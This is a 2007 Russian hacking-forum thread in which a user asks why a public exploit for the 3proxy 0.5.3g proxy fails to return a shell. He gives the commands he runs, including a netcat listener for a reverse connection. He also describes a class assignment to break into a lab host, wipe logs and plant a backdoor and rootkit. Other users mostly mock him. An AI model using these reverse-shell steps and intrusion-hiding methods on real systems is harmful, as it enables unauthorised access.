ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Не пойму причину неработоспособности эксплота для 3proxy 0.5.3g
  #1  
Старый 27.12.2007, 04:10
AlterEgo
Новичок
Регистрация: 07.02.2007
Сообщений: 5
Провел на форуме:
16196

Репутация: 0
По умолчанию Не пойму причину неработоспособности эксплота для 3proxy 0.5.3g

Сам код эксплоита: h_ttp://milw0rm.com/exploits/3829
Тестил в локальное сети.
192.168.2.6 - адрес 3proxy сервера (gentoo 2007, 2.6.23)
192.168.2.3 - адрес атакующего

1. gcc exp.c -o exp
2. nc -l -p 56789
3. ./exp 192.168.2.6 3128 192.168.2.3 0
после выполнения сплоит выдает
attacker host, check it up, now!

И в итоге нихрена - нет какт молчит команды не выполняет? в чем трабл - что я делаю не так?
__________________________________________________ __
Так же пробовал другой эксплоит... h_ttp://milw0rm.com/exploits/3821

с ним таже ситуация - не работает!
И вообще в случае с этим сплоитом нужно ли выполнять nc 192.168.2.6 <забинденный порт?> или сплоит автоматом биндит, бэкконектится и предоставляет шелл?
 
Ответить с цитированием

  #2  
Старый 27.12.2007, 04:17
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

ДА! И правда!! Вот какого хера они неправильно и криво пишут свои 3proxy, что эксплойты не работают против них! В СУД ПОДАТЬ!!!
 
Ответить с цитированием

  #3  
Старый 27.12.2007, 08:29
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Вообще софт должен писаться под существующие эксплойты. Разработчики должны были на milw0rm сходить, посмотреть коды эксплойтов для их программного продукта и уже в соответствии со сплойтами писать свою программу так, чтобы сплойты работали сразу же после скачивания и хацкеру не нужно было даже лезть в исходник
 
Ответить с цитированием

  #4  
Старый 27.12.2007, 08:31
AlterEgo
Новичок
Регистрация: 07.02.2007
Сообщений: 5
Провел на форуме:
16196

Репутация: 0
По умолчанию

Цитата:
ДА! И правда!! Вот какого хера они неправильно и криво пишут свои 3proxy, что эксплойты не работают против них! В СУД ПОДАТЬ!!!
Ну есть же в паблике эксплоиты работающие сразу! Ясно - что в исходнике этого эксплоита есть бага - Если кто знает подскажите где! Было бы очень кстати
 
Ответить с цитированием

  #5  
Старый 27.12.2007, 08:34
AlterEgo
Новичок
Регистрация: 07.02.2007
Сообщений: 5
Провел на форуме:
16196

Репутация: 0
По умолчанию

to krypt3r:

лучше бы по существу что написал... где кривожопность сплоита убрать что бы пахал.
 
Ответить с цитированием

  #6  
Старый 27.12.2007, 08:56
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

Цитата:
Если кто знает подскажите где! Было бы очень кстати
А в чем смысл оставлять чтобы подсказывать?
Опять будут кривожопые скрипткиддисы хакать все подряд (ничего личного)
 
Ответить с цитированием

  #7  
Старый 27.12.2007, 09:26
AlterEgo
Новичок
Регистрация: 07.02.2007
Сообщений: 5
Провел на форуме:
16196

Репутация: 0
По умолчанию

Цитата:
Опять будут кривожопые скрипткиддисы хакать все подряд (ничего личного)
Да ты прав, с одной стороны! Это простая как гвоздь истина... Но помошь благое дело! К тому же когда кидисы были пробемой на то они и кидисы емае ...
 
Ответить с цитированием

  #8  
Старый 27.12.2007, 10:45
spider-intruder
Постоянный
Регистрация: 10.12.2005
Сообщений: 939
Провел на форуме:
3886281

Репутация: 929


Отправить сообщение для spider-intruder с помощью ICQ
По умолчанию

>>>К тому же когда кидисы были пробемой


ВСЕГДА!!!

П.С. - не думал о том что сервис может быть патченый админами которые тоже знают что такое МИЛВОРМ?
 
Ответить с цитированием

  #9  
Старый 27.12.2007, 11:02
AlterEgo
Новичок
Регистрация: 07.02.2007
Сообщений: 5
Провел на форуме:
16196

Репутация: 0
По умолчанию

Цитата:
>>>К тому же когда кидисы были пробемой

ВСЕГДА!!!
Т.е. ты говоришь что кидисы представляют опасность да ну - имхо бред... Как таковой они угрозы не представляют... сам же знаешь что сплоиты почти все с багами выкладывают... ладно не суть!

Цитата:
П.С. - не думал о том что сервис может быть патченый админами которые тоже знают что такое МИЛВОРМ?
ну зачем так бонально то?! Я вкурсе что пропатчили - итд... У меня цель другая: В универе препод дал задание - в локальной сети из 2, 3 продемонтсрировать реальный взлом... Сначала удаленно получить права(не рутовские ясно дело), потом порутать локальным эксплоитом... Почистить логи - бэкдор поставить , руткит для полноты счастья..
Local Root exploit я нашел, работает на ура через багу vixie-crond на ядре 2.6.16.15... Остаьное тоже все есть и работает как надо... Осталось только найти работающий удаленнй эксплоит под любой демон,и который возвращает шелл или биндит его хотябы...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хакер и закон! SladerNon Болталка 17 12.11.2009 09:42
Взлом Unix а silveran *nix 4 21.12.2005 22:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ